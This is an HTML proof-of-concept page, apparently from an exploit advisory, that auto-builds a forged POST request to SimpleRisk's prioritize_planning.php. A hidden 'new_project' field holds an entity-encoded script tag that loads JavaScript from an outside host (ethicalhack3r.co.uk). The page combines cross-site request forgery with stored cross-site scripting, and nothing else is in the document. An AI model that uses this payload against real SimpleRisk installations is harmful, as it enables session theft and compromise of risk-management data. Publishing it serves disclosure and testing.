&lt;html&gt;
  &lt;body&gt;
    &lt;form action=&quot;
http://www.example.com/simplerisk/management/prioritize_planning.php&quot;;
method=&quot;POST&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;new&amp;#95;project&quot;
value=&quot;&amp;lt;script&amp;#32;src&amp;#61;&amp;#47;&amp;#47;ethicalhack3r&amp;#46;co&amp;#46;uk&amp;#47;files&amp;#47;xss&amp;#47;c&amp;#46;j&amp;gt;&amp;lt;&amp;#47;script&amp;gt;&quot;
/&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;add&amp;#95;project&quot; value=&quot;Add&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;projects&quot; value=&quot;&quot; /&gt;
      &lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;
